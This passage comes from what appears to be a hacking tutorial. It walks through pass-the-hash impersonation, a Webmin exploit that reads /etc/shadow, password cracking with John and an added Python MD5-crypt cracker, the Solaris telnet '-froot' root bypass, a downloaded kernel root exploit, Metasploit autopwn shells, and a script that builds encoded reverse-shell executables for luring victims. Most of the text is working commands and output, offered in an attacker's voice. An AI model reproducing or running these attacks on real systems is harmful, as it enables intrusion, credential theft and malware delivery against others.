    Host script results:
    | smb-brute:
    |_ Administrator:F703F386322B0662E72C57EF50F76A05 => Login was successful

    Interesting ports on 192.168.80.135:
    PORT STATE SERVICE
    445/tcp open microsoft-ds

    Host script results:
    | smb-brute:
    | epp:E52CAC67419A9A224A3B108F3FA6CB6D => Login was successful
    |_ Jim:209CA2D6E74286E9AAD3B435B51404EE => Login was successful

    [End Result]————————————————————————————

    Now we can compromise other systems on the network that use the same password (using the hash without cracking it). Use Pass the Hash with the SMB suite (http://foofus.net/jmk/passhash.html)
    to impersonate a user without a password. I use samba-3.0.22 with the patch:

    ./configure --with-smbmount
    patch -p0 whosthere
    WHOSTHERE v1.4 – by Hernan Ochoa ([email protected], [email protected]) – (c) 2007-2008 Core Security Technologies
    This tool lists the active LSA logon sessions with NTLM credentials.
    (use -h for help).
    -B is now used by default. Trying to find correct addresses..Found!.
    the output format is: username:domain:lmhash:nthash

    cwh:SERVER:00000000000000000000000000000000:8846F7EAEE8FB117AD06BDD830B7586C
    Administrator:SERVER2:209CA2D6E74286E9AAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67

    C:\pshtoolkit_v1.4\whosthere>cd ..\iam
    C:\pshtoolkit_v1.4\iam>iam.exe -r cmd.exe -h Administrator:SERVER2:209CA2D6E74286E9AAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67 -B
    IAM v1.4 – by Hernan Ochoa ([email protected], [email protected]) – (c) 2007-2008 Core Security Technologies
    Parameters:
    Username: Administrator
    Domainname: SERVER2
    LM hash: 209CA2D6E74286E9AAD3B435B51404EE
    NT hash: BA69764BCCF8F41121E0B3046CE46C67
    Run: cmd.exe
    LSASRV.DLL version: 00050001h. A280DC0h
    Checking LSASRV.DLL….skipped. (-B was specified).
    Trying to obtain addresses…Ok! (AC = 75753BA0, EM = 7573FDEC)
    The current logon credentials were successful changed!

    [End Result]————————————————————————————

    Now we have Administrator credentials in the new MS-DOS window, which may be able to compromise many machines in the network !!

    #######################################
    [0x02] – The Art of Unix/Linux Attack
    #######################################

    ++++++++++++++++++++++++++++++++++
    [0x02a] – Scanning & Enumeration
    ++++++++++++++++++++++++++++++++++

    The most important thing before starting to hack is gathering as much information as you can.
    You can use the information to guess passwords, find specific points to attack, or anything else
    you can imagine. Our favourite tool for scanning a target is nmap. We learn the open ports and
    the software versions with only one command. We show you below 😀

    [Nmap Result]———————————————————————————–

    bt cwh # nmap -sV www.target.com

    Starting Nmap 4.76 ( http://nmap.org ) at 2009-07-03 16:38 SE Asia Standard Time

    Interesting ports on 192.168.0.111:
    Not shown: 987 closed ports
    PORT STATE SERVICE VERSION
    21/tcp open ftp vsftpd 2.0.6
    22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
    25/tcp open smtp Cisco PIX sanitized smtpd
    53/tcp open domain ISC BIND 9.4.2
    80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g)
    111/tcp filtered rpcbind
    443/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g)
    554/tcp filtered rtsp
    1720/tcp filtered H.323/Q.931
    2000/tcp filtered callbook
    3306/tcp open mysql MySQL (unauthorized)
    5060/tcp filtered sip
    10000/tcp open http Webmin httpd
    Service Info: OSs: Unix, Linux; Device: firewall

    Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds

    [End Result]————————————————————————————

    In the result you see that this system uses Webmin, but we do not know the exact version.
    If we are not suffering from Alzheimer’s, we remember that Webmin had a file disclosure vulnerability in version 1.290.
    We try searching milw0rm.com and, bingo!!, we find one at http://milw0rm.com/exploits/2017 .
    It is a Perl script exploit. So we download the script, save it as 2017.pl and launch the command …

    [Perl Script Result]—————————————————————————-

    bt cwh # perl 2017.pl www.target.com 10000 http /etc/passwd
    root:x:0:0::/root:/bin/bash
    bin:x:1:1:bin:/bin:/bin/false
    daemon:x:2:2:daemon:/sbin:/bin/false
    adm:x:3:4:adm:/var/log:/bin/false
    lp:x:4:7:lp:/var/spool/lpd:/bin/false
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/:/bin/false
    news:x:9:13:news:/usr/lib/news:/bin/false
    uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
    operator:x:11:0:operator:/root:/bin/bash
    games:x:12:100:games:/usr/games:/bin/false
    ftp:x:14:50::/home/ftp:/bin/false
    smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
    mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
    rpc:x:32:32:RPC portmap user:/:/bin/false
    sshd:x:33:33:sshd:/:/bin/false
    gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
    apache:x:80:80:User for Apache:/srv/httpd:/bin/false
    messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
    haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
    pop:x:90:90:POP:/:/bin/false
    nobody:x:99:99:nobody:/:/bin/false
    snort:x:1000:102::/home/snort:/bin/false
    user1:x:1001:100::/home/user1:

    [End Perl Script Result]————————————————————————

    lol !!! It seems that the admin is outdated. She does not update or patch her Webmin.

    ++++++++++++++++++++++++++
    [0x02b] – Gaining Access
    ++++++++++++++++++++++++++

    As the target is a Linux server, it is harder to attack remotely than a Windows server.
    Most remote exploits affecting Linux are in third-party software such as
    FTP, SSH and web servers. The ways to access a Linux server are to exploit third-party
    running services, to get user information from a web application vulnerability and then
    brute force it, and to socially engineer a valid user.

    In our example case, we highly recommend you to try the following command:

    bt cwh # perl 2017.pl www.target.com 10000 http /etc/shadow

    This command tries to read the /etc/shadow file. If the result looks like the one below, you are lucky ;D

    [Perl Script Result]—————————————————————————-

    root:$1$MKy0eqPM$auerQwMpGYcqgBqDddkfO/:13666:0:::::
    bin:*:9797:0:::::
    daemon:*:9797:0:::::
    adm:*:9797:0:::::
    lp:*:9797:0:::::
    sync:*:9797:0:::::
    shutdown:*:9797:0:::::
    halt:*:9797:0:::::
    mail:*:9797:0:::::
    news:*:9797:0:::::
    uucp:*:9797:0:::::
    operator:*:9797:0:::::
    games:*:9797:0:::::
    ftp:*:9797:0:::::
    smmsp:*:9797:0:::::
    mysql:*:9797:0:::::
    rpc:*:9797:0:::::
    sshd:*:9797:0:::::
    gdm:*:9797:0:::::
    pop:*:9797:0:::::
    apache:*:9797:0:::::
    messagebus:*:9797:0:::::
    haldaemon:*:9797:0:::::
    nobody:*:9797:0:::::
    snort:!:13986:0:99999:7:::
    user1:$1$RY88JSH8$1A73wdGEerLFulLzzTnHX0:14428:0:99999:7:::

    [End Perl Script Result]————————————————————————

    We put the result in the file shadow.txt and then try to crack the passwords using John the Ripper
    (dict.lst is the dictionary file).

    [John Result]———————————————————————————–

    bt cwh # john --wordlist=dict.lst shadow.txt
    Loaded 2 password hashes with 2 different salts (FreeBSD MD5 [32/32])
    user1 (user1)
    guesses: 1 time: 0:00:00:00 100% c/s: 150 trying: abc

    [End John Result]——————————————————————————-

    This means the password of user1 is "user1"; no password was found for root with this wordlist.
    You can now log in to the target system with user1's credentials.
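As an added example (not code from the paper), here is a small dictionary cracker in Python for the $1$ hashes in that dump. It implements the scheme John reports as "FreeBSD MD5" (MD5-crypt: 1000 MD5 rounds keyed on password and salt, then a custom base64) so the work behind each guess is visible, skips locked accounts (`*`, `!`) the way John does, and only attacks `$1$` entries. The shadow lines are copied from the output above; the wordlist is constructed for the example.

```python
import hashlib

# Four lines copied from the /etc/shadow dump above: two real hashes, two locked accounts.
SHADOW_SAMPLE = """\
root:$1$MKy0eqPM$auerQwMpGYcqgBqDddkfO/:13666:0:::::
bin:*:9797:0:::::
snort:!:13986:0:99999:7:::
user1:$1$RY88JSH8$1A73wdGEerLFulLzzTnHX0:14428:0:99999:7:::
"""

# Constructed stand-in for dict.lst.
WORDLIST = ["password", "123456", "abc", "root", "user1", "letmein"]

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """crypt(3)-style base64: 6 bits at a time, least significant first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password, salt, magic=b"$1$"):
    """MD5-crypt ($1$) as in FreeBSD/glibc: returns the full '$1$salt$hash' string."""
    pw = password.encode()
    salt = salt.encode()[:8]
    ctx = hashlib.md5(pw + magic + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    remaining = len(pw)
    while remaining > 0:
        ctx.update(alt[: min(16, remaining)])
        remaining -= 16
    bit = len(pw)
    while bit:                       # one byte per bit of len(pw): NUL or pw[0]
        ctx.update(b"\x00" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()
    for i in range(1000):            # stretching loop; this is what makes guessing slow
        r = hashlib.md5()
        r.update(pw if i & 1 else final)
        if i % 3:
            r.update(salt)
        if i % 7:
            r.update(pw)
        r.update(final if i & 1 else pw)
        final = r.digest()
    encoded = b"".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
        for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    ) + _to64(final[11], 2)
    return (magic + salt + b"$" + encoded).decode()


def parse_shadow(text):
    """Yield (user, hash) for accounts with a real hash; '*', '!' and '' are locked."""
    for line in text.splitlines():
        if not line.strip():
            continue
        user, pwfield = line.split(":")[:2]
        if pwfield.startswith("$"):
            yield user, pwfield


def crack(shadow_text, wordlist):
    """Dictionary attack on every $1$ hash; returns {user: password} for the hits."""
    found = {}
    for user, h in parse_shadow(shadow_text):
        if not h.startswith("$1$"):
            continue                 # $5$/$6$ (SHA-crypt) need a different routine
        salt = h.split("$")[2]
        for candidate in wordlist:
            if md5crypt(candidate, salt) == h:
                found[user] = candidate
                break
    return found


if __name__ == "__main__":
    for user, pw in crack(SHADOW_SAMPLE, WORDLIST).items():
        print(f"{user}:{pw}")
```

John's result above tells you what to expect from this wordlist: user1 falls, root does not. Note that the per-guess cost is 1000 MD5 calls, which is why a salted, stretched scheme still needs a good wordlist; $1$ is nevertheless obsolete next to $6$ or yescrypt and is itself a finding worth reporting.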

    Once you have found a way into the system, the next step is to find a way to escalate
    your privileges.

    Here is another example: the telnet vulnerability on Solaris 10/11, which lets you log in
    straight away with root privileges. We just send [telnet -l "-froot" 192.168.0.112] to the
    telnet daemon on Solaris 10/11; the daemon hands that user name to /bin/login, whose -f
    option means "already authenticated", so no password is asked for.

    [Telnet bypass]———————————————————————————

    bt cwh # telnet -l "-froot" 192.168.0.112
    Trying 192.168.0.112...
    Connected to 192.168.0.112.
    Escape character is '^]'.
    Last login: Sun Jun 30 02:02:02 from 192.168.0.2
    Sun Microsystems Inc. SunOS 5.10 Generic January 2007
    # id
    uid=0(root) gid=0(root)
    #

    [End Result]————————————————————————————

    With this technique there is no need to escalate privileges, because we are already logged
    in as root.
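The -l "-froot" trick is an argument injection: the daemon builds the /bin/login command line from the client-supplied user name without a "--" separator, so a name beginning with "-" is parsed as an option, and login's -f option skips password authentication. The following Python model is an added illustration, not the paper's code or Sun's: the option string `pf:h:d:` and the argv layout are assumptions standing in for the real login and in.telnetd, and Python's getopt plays the role of getopt(3).

```python
import getopt

# Assumed option string for /bin/login: -p preserve environment, -f <user> already
# authenticated (no password), -h <host>, -d <tty device>. Illustration only.
LOGIN_OPTS = "pf:h:d:"


def telnetd_argv(username, host="192.168.0.2", device="/dev/pts/3", fixed=False):
    """argv the daemon hands to /bin/login for the USER the client sent.
    fixed=False: the name goes straight in (the vulnerable shape).
    fixed=True : '--' ends option parsing, so the name can never become an option."""
    argv = ["-p", "-h", host, "-d", device]
    if fixed:
        argv.append("--")
    argv.append(username)
    return argv


def login_sees(argv):
    """Parse argv the way a getopt(3)-based login would: (options, operands)."""
    opts, operands = getopt.getopt(argv, LOGIN_OPTS)
    return dict(opts), operands


def authenticated_as(argv):
    """User who gets a shell without a password, or None if login would prompt."""
    opts, _ = login_sees(argv)
    return opts.get("-f")


if __name__ == "__main__":
    for name in ("user1", "-froot"):
        for fixed in (False, True):
            argv = telnetd_argv(name, fixed=fixed)
            print(f"{name!r:10} fixed={fixed!s:5} login argv={argv} "
                  f"pre-authenticated as: {authenticated_as(argv)}")
```

The same bug class shows up wherever untrusted strings are spliced into a command line: the fix is to terminate option parsing with "--" (or reject operands starting with "-"), not to blacklist "-f".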

    ++++++++++++++++++++++++++++++++
    [0x02c] – Escalating Privilege
    ++++++++++++++++++++++++++++++++

    In this article we show how to use a local root exploit for Linux; you can find such
    exploits on milw0rm.com. The first tasks after getting onto the system are to check the
    Linux kernel version and your user id.

    user1@linuxserver:~$ uname -a
    Linux linuxserver 2.6.17-10-server #2 SMP Fri Oct 13 18:47:26 UTC 2006 i686 GNU/Linux
    user1@linuxserver:~$ id
    uid=1001(user1) gid=1001(user1) groups=1001(user1)

    From the output of these two commands we know we want to escalate to root, and we remember
    that there is a local root exploit for Linux 2.6.17 – 2.6.24 on milw0rm.com ;D so we do not
    hesitate to download the code, compile it and run it. The result is shown below ...

    user1@linuxserver:~$ wget http://milw0rm.com/exploits/5092
    --17:17:21-- http://milw0rm.com/exploits/5092
    => `5092'
    Resolving milw0rm.com… 76.74.9.18
    Connecting to milw0rm.com|76.74.9.18|:80… connected.
    HTTP request sent, awaiting response… 200 OK
    Length: unspecified [text/html]

    [ <=> ] 7,197 11.58K/s

    17:17:23 (11.58 KB/s) – `5092′ saved [7197]

    user1@linuxserver:~$ gcc -o 5092 5092.c
    5092.c:289:28: warning: no newline at end of file
    user1@linuxserver:~$ ./5092
    ———————————–
    Linux vmsplice Local Root Exploit
    By qaaz
    ———————————–
    [+] mmap: 0x0 .. 0x1000
    [+] page: 0x0
    [+] page: 0x20
    [+] mmap: 0x4000 .. 0x5000
    [+] page: 0x4000
    [+] page: 0x4020
    [+] mmap: 0x1000 .. 0x2000
    [+] page: 0x1000
    [+] mmap: 0xb7e79000 .. 0xb7eab000
    [+] root
    root@linuxserver:~# id
    uid=0(root) gid=0(root) groups=1001(root)

    Finally, we are root on the target server and can do whatever we want. XD

    #####################################
    [0x03] – Metasploit Ninja-Autopwned
    #####################################

    Metasploit is a tool for exploiting system vulnerabilities, but the penetration tester has to find those vulnerabilities first;
    that is a drawback of Metasploit. The latest version, however, adds a feature called "autopwn" that automatically
    launches exploits against the hosts and services reported by nmap or Nessus.
    Note: there is also a feature called "Autopwn Metasploit Automated" that scans the whole network with nmap and then automates the exploitation.

    +++++++++++++++++++++++++++++++++++++
    [0x03a] – Nmap+Metasploit Autopwned
    +++++++++++++++++++++++++++++++++++++

    [Nmap Result]———————————————————————————–

    bt ~ # nmap -sS 192.168.80.129 -oX nmap.xml

    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 12:04 GMT
    Interesting ports on 192.168.80.129:
    Not shown: 990 closed ports
    PORT STATE SERVICE
    80/tcp open http
    135/tcp open msrpc
    139/tcp open netbios-ssn
    443/tcp open https
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    1027/tcp open IIS
    1433/tcp open ms-sql-s
    3372/tcp open msdtc
    MAC Address: 00:0C:29:CC:CF:46 (VMware)

    Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds

    [End Result]————————————————————————————

    Now we have nmap.xml to import into the Metasploit framework...

    [Import Nmap result to Metasploit]————————————————————–

    bt framework3 # msfconsole
    (msfconsole banner)

    =[ msf v3.3-dev
    + -- --=[ 288 exploits - 124 payloads
    + -- --=[ 17 encoders - 6 nops
    =[ 56 aux

    msf > load db_sqlite3
    [*] Successfully loaded plugin: db_sqlite3
    msf > db_create /tmp/test.db
    [*] Creating a new database instance…
    [*] Successfully connected to the database
    [*] File: /tmp/test.db
    msf > db_import_nmap_xml /root/nmap.xml
    msf > db_hosts
    [*] Time: Fri Jul 03 14:01:56 +0000 2009 Host: 192.168.80.129 Status: alive OS:
    msf > db_autopwn -p -e
    [*] (3/116): Launching exploit/unix/webapp/tikiwiki_jhot_exec against 192.168.80.129:80…
    [*] (8/116): Launching exploit/unix/webapp/awstats_configdir_exec against 192.168.80.129:80…
    [*] (9/116): Launching exploit/windows/http/bea_weblogic_transfer_encoding against 192.168.80.129:80…

    [*] Started bind handler
    [*] Started bind handler
    [*] (12/116): Launching exploit/unix/webapp/awstats_migrate_exec against 192.168.80.129:80…
    [*] (13/116): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135…
    [*] Started bind handler
    [*] Started bind handler
    [*] Job limit reached, waiting on modules to finish…
    [*] The server returned: 404 Object Not Found
    [*] This server may not be vulnerable
    [*] Started bind handler
    [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal…
    [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:[email protected]_ip_tcp:192.168.80.129[135] …
    [*] The server returned: 404 Object Not Found
    [*] This server may not be vulnerable
    [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:[email protected]_ip_tcp:192.168.80.129[135] …
    [*] Sending exploit …
    [*] The DCERPC service did not reply to our request
    [*] Command shell session 1 opened (192.168.80.131:52929 -> 192.168.80.129:10529)
    …….
    …….
    sessions -l

    Active sessions
    ===============

    Id Description Tunnel
    — ———– ——
    1 Command shell 192.168.80.131:52929 -> 192.168.80.129:10529
    2 Command shell 192.168.80.131:50775 -> 192.168.80.129:17887
    3 Command shell 192.168.80.131:40985 -> 192.168.80.129:37295
    4 Command shell 192.168.80.131:51652 -> 192.168.80.129:37095
    5 Command shell 192.168.80.131:38373 -> 192.168.80.129:17130
    6 Command shell 192.168.80.131:56722 -> 192.168.80.129:20693

    msf >sessions -i 1
    [*] Starting interaction with 1…

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>ipconfig
    ipconfig

    Windows 2000 IP Configuration

    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . : localdomain
    IP Address. . . . . . . . . . . . : 192.168.80.129
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.80.2

    C:\WINNT\system32>

    [End Result]————————————————————————————

    +++++++++++++++++++++++++++++++++++++++
    [0x03b] – Nessus+Metasploit Autopwned
    +++++++++++++++++++++++++++++++++++++++

    First, run a Nessus vulnerability scan and export the result as a *.nbe file, then import it into the Metasploit framework for autopwn.

    [Import Nessus(nbe) result to Metasploit]——————————————————-

    bt framework3 # msfconsole

    (msfconsole banner)

    =[ msf v3.3-dev
    + -- --=[ 288 exploits - 124 payloads
    + -- --=[ 17 encoders - 6 nops
    =[ 56 aux

    msf > load db_sqlite3
    [*] Successfully loaded plugin: db_sqlite3
    msf > db_create /tmp/ness.db
    [*] Creating a new database instance…
    [*] Successfully connected to the database
    [*] File: /tmp/ness.db
    msf > db_import_nessus_nbe /root/demo.nbe
    msf > db_hosts
    [*] Time: Fri Jul 03 14:43:58 +0000 2009 Host: 192.168.80.129 Status: alive OS:
    msf > db_autopwn -x -t
    [*] Analysis completed in 4.28915095329285 seconds (17 vulns / 1145 refs)
    [*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.80.129:445…
    [*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135…
    [*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.80.129:445…
    [*] Matched exploit/windows/mssql/ms02_039_slammer against 192.168.80.129:1434…
    [*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.80.129:445…
    [*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.80.129:445…
    msf > db_autopwn -x -e
    [*] (2/6): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135…
    [*] (3/6): Launching exploit/windows/smb/ms06_040_netapi against 192.168.80.129:445…

    [*] Started bind handler
    [*] (4/6): Launching exploit/windows/mssql/ms02_039_slammer against 192.168.80.129:1434…
    [*] Started bind handler
    [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal…
    [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:[email protected]_ip_tcp:192.168.80.129[135] …
    [*] (5/6): Launching exploit/windows/smb/ms05_039_pnp against 192.168.80.129:445…
    [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:[email protected]_ip_tcp:192.168.80.129[135] …
    [*] Started bind handler
    [*] (6/6): Launching exploit/windows/smb/ms04_011_lsass against 192.168.80.129:445…
    [*] Sending UDP packet with return address 0x42b48774
    [*] Execute ‘net start sqlserveragent’ once access is obtained
    [*] Started bind handler
    [*] Connecting to the SMB service…
    [*] Sending exploit …
    msf >
    [*] Detected a Windows 2000 target
    [*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[email protected]_np:192.168.80.129[\BROWSER] …
    [*] Started bind handler
    [*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:[email protected]_np:192.168.80.129[\browser] …
    [*] The DCERPC service did not reply to our request
    [*] Command shell session 1 opened (192.168.80.131:41655 -> 192.168.80.129:39354)
    [*] Command shell session 2 opened (192.168.80.131:57118 -> 192.168.80.129:7605)
    [*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:[email protected]_np:192.168.80.129[\lsarpc]…
    [*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[email protected]_np:192.168.80.129[\BROWSER] …
    [*] Building the stub data…
    [*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:[email protected]_np:192.168.80.129[\browser] …
    [*] Calling the vulnerable function…
    [*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:[email protected]_np:192.168.80.129[\lsarpc]…
    [*] Getting OS information…
    [*] Trying to exploit Windows 5.0
    [*] Calling the vulnerable function…
    [+] Server did not respond, this is expected
    [*] Command shell session 3 opened (192.168.80.131:50407 -> 192.168.80.129:15299)
    [*] Command shell session 4 opened (192.168.80.131:32768 -> 192.168.80.129:30092)
    [*] The DCERPC service did not reply to our request
    [*] Command shell session 5 opened (192.168.80.131:39556 -> 192.168.80.129:17330)
    sessions -l

    Active sessions
    ===============

    Id Description Tunnel
    — ———– ——
    1 Command shell 192.168.80.131:41655 -> 192.168.80.129:39354
    2 Command shell 192.168.80.131:57118 -> 192.168.80.129:7605
    3 Command shell 192.168.80.131:50407 -> 192.168.80.129:15299
    4 Command shell 192.168.80.131:32768 -> 192.168.80.129:30092
    5 Command shell 192.168.80.131:39556 -> 192.168.80.129:17330

    msf > sessions -i 3
    [*] Starting interaction with 3…

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>ipconfig
    ipconfig

    Windows 2000 IP Configuration

    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . : localdomain
    IP Address. . . . . . . . . . . . : 192.168.80.129
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.80.2

    C:\WINNT\system32>

    [End Result]————————————————————————————
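To make the difference between the two runs concrete (db_autopwn -p in section 0x03a, -x in 0x03b), the following added Python example, which is not Metasploit code, parses an nmap -oX file for open ports and matches modules two ways: by port, as -p does from each module's default RPORT, and by vulnerability reference, as -x does from the references on imported Nessus findings. The XML, the Nessus findings and both lookup tables are constructed for the example; the module names are the ones that appear in the output above.

```python
import xml.etree.ElementTree as ET

# Constructed nmap -oX output for the scan in section 0x03a (same host, same open ports).
NMAP_XML = """\
<nmaprun scanner="nmap" args="nmap -sS 192.168.80.129 -oX nmap.xml">
  <host>
    <status state="up"/>
    <address addr="192.168.80.129" addrtype="ipv4"/>
    <address addr="00:0C:29:CC:CF:46" addrtype="mac" vendor="VMware"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="1433"><state state="open"/><service name="ms-sql-s"/></port>
      <port protocol="tcp" portid="1434"><state state="closed"/><service name="ms-sql-m"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Port -> modules, trimmed to modules seen in the page's db_autopwn output. The real
# db_autopwn -p builds this table from every module's default RPORT.
PORT_MODULES = {
    80: ["exploit/unix/webapp/tikiwiki_jhot_exec",
         "exploit/unix/webapp/awstats_configdir_exec",
         "exploit/windows/http/bea_weblogic_transfer_encoding"],
    135: ["exploit/windows/dcerpc/ms03_026_dcom"],
    445: ["exploit/windows/smb/ms06_040_netapi",
          "exploit/windows/smb/ms05_039_pnp",
          "exploit/windows/smb/ms04_011_lsass"],
}

# Vulnerability reference -> module, the kind of mapping -x uses. References here are
# the MS bulletin IDs implied by the module names above.
REF_MODULES = {
    "MS03-026": "exploit/windows/dcerpc/ms03_026_dcom",
    "MS06-040": "exploit/windows/smb/ms06_040_netapi",
    "MS05-039": "exploit/windows/smb/ms05_039_pnp",
    "MS04-011": "exploit/windows/smb/ms04_011_lsass",
}

# Constructed stand-in for the (host, port, reference) rows a Nessus .nbe import yields.
NESSUS_FINDINGS = [
    ("192.168.80.129", 135, "MS03-026"),
    ("192.168.80.129", 445, "MS06-040"),
    ("192.168.80.129", 445, "MS04-011"),
]


def open_ports(xml_text):
    """(addr, proto, port, service) for every open port of every live host."""
    result = []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = next(a.get("addr") for a in host.iter("address") if a.get("addrtype") == "ipv4")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            result.append((addr, port.get("protocol"), int(port.get("portid")),
                           svc.get("name") if svc is not None else ""))
    return result


def match_by_port(ports):
    """-p style: every module whose default port is open gets launched, OS or not."""
    return [(addr, port, m) for addr, proto, port, _ in ports if proto == "tcp"
            for m in PORT_MODULES.get(port, [])]


def match_by_vuln(findings):
    """-x style: only modules tied to a vulnerability the scanner actually reported."""
    return [(addr, port, REF_MODULES[ref]) for addr, port, ref in findings if ref in REF_MODULES]


if __name__ == "__main__":
    ports = open_ports(NMAP_XML)
    for launch in match_by_port(ports):
        print("by port:", *launch)
    for launch in match_by_vuln(NESSUS_FINDINGS):
        print("by vuln:", *launch)
```

The port-based run fires Unix web-app exploits at a Windows 2000 host, exactly what the 0x03a output shows, which is noise in the target's logs and wasted time; the reference-based run only launches what the scanner found. That is the practical reason to prefer -x when you have a vulnerability scan to import.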

    #############################################
    [0x04] – Client-Side Attack with Metasploit
    #############################################

    ++++++++++++++++++++++++++++++++++++++++
    [0x04a] – Metasploit Payload Generator
    ++++++++++++++++++++++++++++++++++++++++

    The Metasploit Payload Generator is a tool that lets you create malicious code easily.
    It does not exploit a system: you use it to create a malicious payload, save it as an exe file,
    and then lure a victim into executing that file on his or her machine.

    There is a feature to encode the payload to get past most AV and IDS/IPS (13 encoding choices).
    We can use the Metasploit Payload Generator from "Fast-Track"; if you don't have Fast-Track, you only need
    the Metasploit framework and the script below 😉

    [metascript]————————————————————————————

    #!/bin/bash
    # Builds an encoded reverse-connect payload with msfpayload | msfencode,
    # then starts the matching multi/handler listener with msfcli.
    MSF=/pentest/exploits/framework3

    echo "###########################################"
    echo "#### 0-Days Exploits with MetaCompiler ####"
    echo "###########################################"
    echo ""
    echo -n "Enter your Listener IP Address: "
    read -r ip
    echo -n "Enter your Listener Port: "
    read -r port
    echo ""
    echo "-= MetaCompiler Payloads =-"
    echo ""
    echo "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
    echo "+ Meterpreter Reverse Connectback - windows/meterpreter/reverse_tcp +"
    echo "+ VNC Inject Reverse Connectback - windows/vncinject/reverse_tcp +"
    echo "+ Generic Reverse Shell - generic/shell_reverse_tcp +"
    echo "+ Linux X86 Reverse Shell - linux/x86/shell_reverse_tcp +"
    echo "+ Mac OSX (iphone) Reverse Shell - osx/ppc/shell/reverse_tcp +"
    echo "+ Windows Reverse Shell - windows/shell/reverse_tcp +"
    echo "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
    echo ""
    echo -n "Enter your Payload Exploit: "
    read -r payload
    echo -n "Enter your Output file name (xpl.exe): "
    read -r file
    echo ""
    echo "-= Processing =-"
    # R writes raw shellcode to stdout; msfencode with an empty bad-char list (-b '')
    # encodes it and wraps it in a PE executable.
    "$MSF/msfpayload" "$payload" LHOST="$ip" LPORT="$port" R | "$MSF/msfencode" -b '' -t exe -o "$file"
    echo "Enjoy 0-Days Exploit with $file ;)"
    echo ""
    echo ""
    echo "-= Now Waiting for Reverse Connection from Victim =-"
    "$MSF/msfcli" multi/handler PAYLOAD="$payload" LHOST="$ip" LPORT="$port" DisableCourtesyShell=True E

    [End script]————————————————————————————

    Next, an example using "Fast-Track".

    [Metasploit Gen]——————————————————————————–

    bt fast-track # ./fast-track.py -i

    ***********************************************
    ******* Performing dependency checks… *******
    ***********************************************

    *** FreeTDS and PYMMSQL are installed. (Check) ***
    *** PExpect is installed. (Check) ***
    *** ClientForm is installed. (Check) ***
    *** Psyco is installed. (Check) ***
    *** Beautiful Soup is installed. (Check) ***
    *** PyMills is installed. (Check) ***

    Also ensure ProFTP, WinEXE, and SQLite3 is installed from
    the Updates/Installation menu.

